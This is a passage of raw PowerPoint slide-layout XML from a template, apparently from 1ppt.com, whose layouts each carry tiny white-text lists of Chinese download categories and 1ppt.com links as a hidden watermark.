              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout199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99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99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199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0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00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00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00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00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00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00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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout200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00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00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00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0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01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01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01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01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01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01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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout201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01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01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01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0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02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02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02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02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02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02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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
